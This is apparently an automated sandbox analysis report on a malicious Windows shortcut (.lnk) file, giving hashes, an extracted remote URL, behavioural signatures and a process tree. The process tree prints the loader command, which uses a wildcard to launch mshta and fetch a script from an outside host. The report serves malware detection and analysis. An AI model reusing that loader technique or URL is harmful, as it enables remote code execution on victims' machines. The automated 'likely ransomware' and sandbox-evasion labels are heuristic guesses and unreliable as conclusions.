Analysis
-
max time kernel
1802s -
max time network
1826s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
23-11-2022 10:03
Static task
static1
Behavioral task
behavioral1
Sample
8f05021071c4bfd4cfce3d02bd30bf16f1322170515d796e13f75eb25b09d533.lnk
Resource
win10v2004-20221111-en
General
-
Target
8f05021071c4bfd4cfce3d02bd30bf16f1322170515d796e13f75eb25b09d533.lnk
-
Size
1KB
-
MD5
99066332471d626dce4b2fd8c0543aea
-
SHA1
e273ed808f0ef67b71afcb7f77da80be56228a58
-
SHA256
8f05021071c4bfd4cfce3d02bd30bf16f1322170515d796e13f75eb25b09d533
-
SHA512
95cc97a541a69bb3283221d9db0ce8ec3a9c5830c85b5c99991899706dbbd519eada6023ef77b1b0969666d1f17b366ff33d37a36db9e0130f90d6a3b35ec25c
Malware Config
Extracted
https://doc.gdocshare.one/SYsWCc9+dx+o/gL79ReA3h7/r6r1OIXpUPR0vbw20DQ=
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
mshta.exeflow pid process 52 4924 mshta.exe 57 4924 mshta.exe 61 4924 mshta.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 1656 WINWORD.EXE 1656 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
taskmgr.exepid process 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
taskmgr.exeWINWORD.EXEpid process 1640 taskmgr.exe 1656 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
taskmgr.exedescription pid process Token: SeDebugPrivilege 1640 taskmgr.exe Token: SeSystemProfilePrivilege 1640 taskmgr.exe Token: SeCreateGlobalPrivilege 1640 taskmgr.exe Token: 33 1640 taskmgr.exe Token: SeIncBasePriorityPrivilege 1640 taskmgr.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
taskmgr.exepid process 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
taskmgr.exepid process 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe -
Suspicious use of SetWindowsHookEx 35 IoCs
Processes:
WINWORD.EXEpid process 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE 1656 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.execmd.exedescription pid process target process PID 4092 wrote to memory of 3872 4092 cmd.exe cmd.exe PID 4092 wrote to memory of 3872 4092 cmd.exe cmd.exe PID 3872 wrote to memory of 4924 3872 cmd.exe mshta.exe PID 3872 wrote to memory of 4924 3872 cmd.exe mshta.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\8f05021071c4bfd4cfce3d02bd30bf16f1322170515d796e13f75eb25b09d533.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k for %i IN (C:\Windows\system32\*sht*xe) DO start /b %~ni "https://doc.gdocshare.one/SYsWCc9+dx+o/gL79ReA3h7/r6r1OIXpUPR0vbw20DQ=" & exit2⤵
- Suspicious use of WriteProcessMemory
PID:3872 -
C:\Windows\system32\mshta.exemshta "https://doc.gdocshare.one/SYsWCc9+dx+o/gL79ReA3h7/r6r1OIXpUPR0vbw20DQ="3⤵
- Blocklisted process makes network request
PID:4924
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /71⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1640
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Documents\Files.docx" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1656
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Documents\Are.docx" /o ""1⤵PID:2128